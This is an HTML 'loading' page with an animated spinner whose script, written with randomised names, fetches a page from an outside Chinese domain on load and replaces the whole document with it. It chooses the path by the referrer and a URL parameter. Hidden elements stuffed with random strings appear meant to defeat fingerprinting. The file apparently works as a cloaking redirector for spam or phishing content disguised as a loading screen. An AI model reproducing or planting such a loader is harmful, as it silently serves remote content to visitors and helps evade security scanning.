<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .RDaDlYtM7F7 {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .RDaDlYtM7F7 .DU63D2er {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .RDaDlYtM7F7 .content {
            line-height: 50px;
            text-align: center
        }

        .RDaDlYtM7F7 .img {
            width: 100%
        }

        .RDaDlYtM7F7 .xDSW0iw {
            text-align: center
        }

        .RDaDlYtM7F7 .xDSW0iw span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .RDaDlYtM7F7 .xDSW0iw span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .RDaDlYtM7F7 .xDSW0iw span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .RDaDlYtM7F7 .xDSW0iw span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .RDaDlYtM7F7 .xDSW0iw span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .RDaDlYtM7F7 .xDSW0iw span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .RDaDlYtM7F7 .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function CDkmoAwFbfRw(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var T73r8t = CDkmoAwFbfRw('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ T73r8t +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ T73r8t +".html?a=share";
		}
		
        cy0sHNN=url+"#"+new Date().getTime();
        cy0sHNN && function() {
            $.get(cy0sHNN, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<a  href='#' style='display:none'>o8N3ow0Rsz49Lw7xnODWnqKNgM1B2AXGpw7LG404sDK</a>
<a  href='#' style='display:none'>o8N3ow0Rsz49Lw7xnODWnqKNgM1B2AXGpw7LG404sDK</a>
<ul style='display:none' >pv0iXaZyh7QSyr5S</ul>
<b style='display:none' >g9BeMSUl4HjjL9TFvGZpEfPaF7gRam4DI2pSZQ9evzyim6NjBNUsAz</b>
<b style='display:none' >g9BeMSUl4HjjL9TFvGZpEfPaF7gRam4DI2pSZQ9evzyim6NjBNUsAz</b>
<img  src='' style='display:none'>
<b style='display:none' >g9BeMSUl4HjjL9TFvGZpEfPaF7gRam4DI2pSZQ9evzyim6NjBNUsAz</b><div class="RDaDlYtM7F7">
    <div class="DU63D2er">
        <div class="xDSW0iw">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<b style='display:none' >RZ1RQjcPbjDvYc0d3cp</b>
<li style='display:none' >c3goemSd0Fter6UXDHzYUE4ncGgPGQn9MtAdQVT4GuiUGGL48fwMuDI8VlPXMmEbNJDh6vz1PKpph72Td8zKeSRqNGV2rgU</li>
<li style='display:none' >c3goemSd0Fter6UXDHzYUE4ncGgPGQn9MtAdQVT4GuiUGGL48fwMuDI8VlPXMmEbNJDh6vz1PKpph72Td8zKeSRqNGV2rgU</li>
<ul style='display:none' >HaRPJjDy3PpQ</ul>
<b style='display:none' >RZ1RQjcPbjDvYc0d3cp</b>
<a  href='#' style='display:none'>d5sTFafOaJQx1GNISYteADCNEjcOEgl6couXwHavugJGibeX9A4WYMPUfl9XnmXZLooWFnCB8VaPtZi7KVpgVd6Bz5bcktSuU</a>
<p  style='display:none'>WiM3qwubPgavFG1SwfLjFmYSc6p9ISEz7urb8txY7T9a2SzIZFT40ikId</p>
<li style='display:none' >c3goemSd0Fter6UXDHzYUE4ncGgPGQn9MtAdQVT4GuiUGGL48fwMuDI8VlPXMmEbNJDh6vz1PKpph72Td8zKeSRqNGV2rgU</li>
<li style='display:none' >c3goemSd0Fter6UXDHzYUE4ncGgPGQn9MtAdQVT4GuiUGGL48fwMuDI8VlPXMmEbNJDh6vz1PKpph72Td8zKeSRqNGV2rgU</li>
<a  href='#' style='display:none'>d5sTFafOaJQx1GNISYteADCNEjcOEgl6couXwHavugJGibeX9A4WYMPUfl9XnmXZLooWFnCB8VaPtZi7KVpgVd6Bz5bcktSuU</a></body>
</html>